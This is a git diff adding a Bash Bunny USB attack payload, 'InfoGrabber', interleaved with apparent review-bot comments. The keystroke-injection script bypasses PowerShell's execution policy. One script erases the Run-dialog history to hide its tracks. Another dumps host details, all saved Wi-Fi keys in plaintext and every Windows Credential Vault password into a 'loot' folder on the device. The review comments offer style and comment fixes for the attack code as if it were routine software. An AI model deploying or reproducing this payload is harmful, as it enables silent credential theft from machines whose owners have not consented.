diff --git a/payloads/library/InfoGrabber/info.ps1 b/payloads/library/InfoGrabber/info.ps1 new file mode 100644 index 00000000..e97622f6 --- /dev/null +++ b/payloads/library/InfoGrabber/info.ps1 
@@ -0,0 +1,206 @@ +# Shows details of currently running PC +# Simen Kjeserud (Original creator), Gachnang + +#Get info about pc +$computerPubIP=(Invoke-WebRequest ipinfo.io/ip).Content +$computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1} +$IsDHCPEnabled = $false +$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled} +foreach ($Network in $Networks) { +If($network.DHCPEnabled) { +$IsDHCPEnabled = $true + } +[string[]]$computerMAC =$Network.MACAddress +} + +$computerSystem = Get-CimInstance CIM_ComputerSystem +$computerBIOS = Get-CimInstance CIM_BIOSElement + +$computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List +$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List +$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List + +$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} +$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table + +# Get HDDs +$driveType = @{ + 2="Removable disk " + 3="Fixed local disk " + 4="Network disk " + 5="Compact disk "} +$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 
1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } + +# Check RDP +$RDP +if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { + $RDP = "RDP is Enabled" +} else { + $RDP = "RDP is NOT enabled" +} + +# Get network interfaces +#| where { $_.ipaddress -notlike $null } +$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress + +# Get wifi SSID and password +$WLANProfileNames =@() +#Get all the WLAN profile names +$Output = netsh.exe wlan show profiles | Select-String -pattern " : " +#Trim the output to receive only the name +Foreach($WLANProfileName in $Output){ + $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim() +} +$WLANProfileObjects =@() +#Bind the WLAN profile names and also the password to a custom object +Foreach($WLANProfileName in $WLANProfileNames){ + #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user + try{ + $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim() + }Catch{ + $WLANProfilePassword = "The password is not stored in this profile" + } + #Build the object and add this to an array + $WLANProfileObject = New-Object PSCustomobject + $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value 
$WLANProfileName + $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword + $WLANProfileObjects += $WLANProfileObject + Remove-Variable WLANProfileObject +} + +# local-user +$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID + +# process first +$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine + +# get listeners / ActiveTcpConnections +#[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpConnections() | Format-Table -AutoSize +$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess +$listener = $listener | foreach-object { + $listenerItem = $_ + $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess }) + new-object PSObject -property @{ + "LocalAddress" = $listenerItem.LocalAddress + "RemoteAddress" = $listenerItem.RemoteAddress + "State" = $listenerItem.State + "AppliedSetting" = $listenerItem.AppliedSetting + "OwningProcess" = $listenerItem.OwningProcess + "ProcessName" = $processItem.ProcessName + } +} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table + +# process last +$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine + +# service +$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName + +# installed software (get uninstaller) +$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, 
Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize + +# drivers +$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion + +# videocard +$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution + +#Get installed passwords +$profileRows = $output | Select-String -Pattern 'All User Profile' +$profileNames = New-Object System.Collections.ArrayList +for($i = 0; $i -lt $profileRows.Count; $i++){ +$profileName = ($profileRows[$i] -split ":")[-1].Trim() +$profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear +$SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name' +$profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"' +$passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content' +if($passwordSearchResult){ +$profilePw = ($passwordSearchResult -split ":")[-1].Trim() +} else { +$profilePw = '' +} +$networkObject = New-Object -TypeName psobject -Property @{ +ProfileName = $profileName +SSID = $profileSSID +Password = $profilePw +} +$profileNames.Add($networkObject) +} +$profileNames.Add($networkObject) + +[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] +$vault = New-Object Windows.Security.Credentials.PasswordVault +$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } + +#The output +Clear-Host +Write-Host + +$computerSystem.Name +"==================================================================" +"Manufacturer: " + $computerSystem.Manufacturer +"Model: " + $computerSystem.Model +"Serial Number: " + $computerBIOS.SerialNumber +"" +"" +"" + +"OS:" +"=================================================================="+ ($computerOs| out-string) + +"CPU:" +"=================================================================="+ 
($computerCpu| out-string) + +"RAM:" +"==================================================================" +"Capacity: " + $computerRamCapacity+ ($computerRam| out-string) + +"Mainboard:" +"=================================================================="+ ($computerMainboard| out-string) + +"Bios:" +"=================================================================="+ (Get-WmiObject win32_bios| out-string) + + + +"Local-user:" +"=================================================================="+ ($luser| out-string) + +"HDDs:" +"=================================================================="+ ($Hdds| out-string) + +"Network: " +"==================================================================" +"Computers MAC adress: " + $computerMAC +"Computers IP adress: " + $computerIP.ipaddress[0] +"Public IP adress: " + $computerPubIP +"RDP: " + $RDP +"" +($Network| out-string) + +"W-Lan profiles: " +"=================================================================="+ ($WLANProfileObjects| out-string) + +"listeners / ActiveTcpConnections" +"=================================================================="+ ($listener| out-string) + +"Current running process: " +"=================================================================="+ ($process| out-string) + +"Services: " +"=================================================================="+ ($service| out-string) + +"Installed software:" +"=================================================================="+ ($software| out-string) + +"Installed drivers:" +"=================================================================="+ ($drivers| out-string) + +"Installed videocards:" +"==================================================================" + ($videocard| out-string) + +"Windows/user passwords" +"==================================================================" +$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize + + 
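Review bot: The header comment at the top of the hunk, `# Shows details of currently running PC`, understates what the file writes out: the `netsh.exe wlan show profiles ... key=clear` loop and the `Windows.Security.Credentials.PasswordVault` block near the end emit stored Wi-Fi keys and Credential Vault passwords in plaintext alongside the hardware inventory, and the readme added in this same commit only mentions wifi passwords. Suggest making the header explicit, e.g. `# Inventory report; ALSO dumps stored Wi-Fi keys and Credential Vault entries in plaintext - treat the output file as sensitive and delete it after the engagement`, and mirroring that sentence in readme.md. Separately, the second `$profileNames.Add($networkObject)` after the `for` loop appends the last entry a second time, and `$profileNames` is never referenced in the output section, so that whole block appears to be dead code that should be removed rather than left for the next reader to puzzle over.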
diff --git a/payloads/library/InfoGrabber/payload.txt b/payloads/library/InfoGrabber/payload.txt
new file mode 100644
index 00000000..aad67e3c
--- /dev/null
+++ b/payloads/library/InfoGrabber/payload.txt
@@ -0,0 +1,43 @@
+#!/bin/bash
+#
+# Title: Info_Grabber
+# Author: Simen Kjeserud
+# Version: 1.0
+# Target: Windows
+# Creds: Hak5Darren for inspiration
+#
+# Executes run.ps1 which executes scripts that gets you information about
+# the computer running and will also get wifi passwords
+
+
+LED R B 100
+ATTACKMODE HID STORAGE
+
+#Check swith copied from bunny_helper
+
+check_switch() {
+ switch1=`cat /sys/class/gpio_sw/PA8/data`
+ switch2=`cat /sys/class/gpio_sw/PL4/data`
+ switch3=`cat /sys/class/gpio_sw/PL3/data`
+ if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then
+ SWITCH_POSITION="switch1"
+ elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then
+ SWITCH_POSITION="switch2"
+ elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then
+ SWITCH_POSITION="switch3"
+ else
+ SWITCH_POSITION="invalid"
+ fi
+}
+
+check_switch
+
+# Set your language here
+QUACK SET_LANGUAGE no
+QUACK GUI r
+QUACK DELAY 200
+# Open run and run the run.ps1 script in the Bashbunny
+QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
+QUACK ENTER
+LED G
+#Green means good to go
diff --git a/payloads/library/InfoGrabber/readme.md b/payloads/library/InfoGrabber/readme.md
new file mode 100644
index 00000000..7432383d
--- /dev/null
+++ b/payloads/library/InfoGrabber/readme.md
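Review bot: The `check_switch` function in payload.txt uses backtick command substitution and single-bracket tests, which the rest of the bunny payload library and ShellCheck both discourage; `$(...)` nests and reads more clearly, e.g. `switch1=$(cat /sys/class/gpio_sw/PA8/data)` for each of the three reads, and `[[ "$switch1" == "0" && "$switch2" == "1" && "$switch3" == "1" ]]` removes the need for the `x`-prefix idiom. The comment `#Check swith copied from bunny_helper` also has a typo and should read `# Check switch position (copied from bunny_helper)`. Both are style points only; the resulting `SWITCH_POSITION` values are unchanged.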
@@ -0,0 +1,81 @@
+# InfoGrabber for the Bunnys
+
+Author: Simen Kjeserud
+
+Version: Version 1.0
+
+Credit: Hak5Darren for inspiration
+
+ ((`\
+ ___ \\ '--._
+ .'` `' o )
+ / \ '. __.'
+ _| /_ \ \_\_
+ {_\______\-'\__\_\
+ Check out my website:
+ aknemis.com
+
+## Description
+
+Gather a lot of information about the computer and place it in a text file in loot/info/.
+
+Here you can se what it will look like:
+
+
+ System Information for: DESKTOP-9BVPPVN
+
+ Manufacturer: Dell Inc.
+
+ Model: XPS 13 9360
+
+ Serial Number: *******
+
+ CPU: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz
+
+ HDD Capacity: 464.38GB
+
+ HDD Space: 82.32 % Free (382.28GB)
+
+ RAM: 15.89GB
+
+ Operating System: Microsoft Windows 10 Home, Service Pack: 0
+
+ User logged In: DESKTOP-9BVPPVN\aknem
+
+ Last Reboot: 02/21/2017 19:49:30
+
+ Computers MAC adress: ****************
+
+ Computers IP adress: ***********
+
+ Public IP adress: ****************
+
+ RDP: RDP is NOT enabled
+
+
+ | ProfileName | SSID | Password |
+ | ---------------- | ------------------------------------- | ------------------------------------- |
+ | privatsna11234 | privatsna11234 | ******** |
+ | privatsna11234 | privatsna11234 | ******** |
+
+
+
+## Configuration
+
+Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input.
+
+## Requirements
+
+DuckyTools for the BashBunny, and you need to change to the language the computer uses.
+
+## STATUS
+
+| LED | Status |
+| ---------------- | ------------------------------------- |
+| Purple (blinking)| Attack in progress |
+| Green | Attack Finished |
+
+
+
+## Discussion (Not yet created)
+[Hak5 Forum Thread not yet created](https://forums.hak5.org/index.php?/topic/ "Hak5 Forum Thread")
diff --git a/payloads/library/InfoGrabber/run.ps1 b/payloads/library/InfoGrabber/run.ps1
new file mode 100644
index 00000000..0a4e251a
--- /dev/null
+++ b/payloads/library/InfoGrabber/run.ps1
@@ -0,0 +1,35 @@ +#Remove run history +powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" + +#Get the path and file name that you are using for output +# find connected bashbunny drive: +$VolumeName = "bashbunny" +$computerSystem = Get-CimInstance CIM_ComputerSystem +$backupDrive = $null +get-wmiobject win32_logicaldisk | % { + if ($_.VolumeName -eq $VolumeName) { + $backupDrive = $_.DeviceID + } +} + +#See if a loot folder exist in usb. If not create one +$TARGETDIR = $backupDrive + "\loot" +if(!(Test-Path -Path $TARGETDIR )){ + New-Item -ItemType directory -Path $TARGETDIR +} + +#See if a info folder exist in loot folder. If not create one +$TARGETDIR = $backupDrive + "\loot\info" +if(!(Test-Path -Path $TARGETDIR )){ + New-Item -ItemType directory -Path $TARGETDIR +} + +#Create a path that will be used to make the file +$datetime = get-date -f yyyy-MM-dd_HH-mm +$backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt" + +#Create output from info script +$TARGETDIR = $MyInvocation.MyCommand.Path +$TARGETDIR = $TARGETDIR -replace ".......$" +cd $TARGETDIR +PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath \ No newline at end of file
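Review bot: The first line's `Remove-ItemProperty ... RunMRU` silently wipes the user's Run-dialog history, a modification of target state that neither this file's comments nor the readme in this commit mention; the terse `#Remove run history` should state the why and flag the side effect, e.g. `# Clears the Run-dialog MRU in HKCU that the GUI r keystrokes leave behind - this modifies target state and should be disclosed in the engagement notes`. Also, when no volume named `bashbunny` is found, `$backupDrive` stays `$null`, so `$TARGETDIR` becomes `\loot` and the two `New-Item` calls plus the final `> $backupPath` redirect appear to create `\loot\info\<host> - <date>.txt` on the target's current drive instead of failing; that fallback is worth a comment next to `$backupDrive = $null`, e.g. `# NOTE: if the bashbunny volume is not found, the paths below resolve on the target's current drive`.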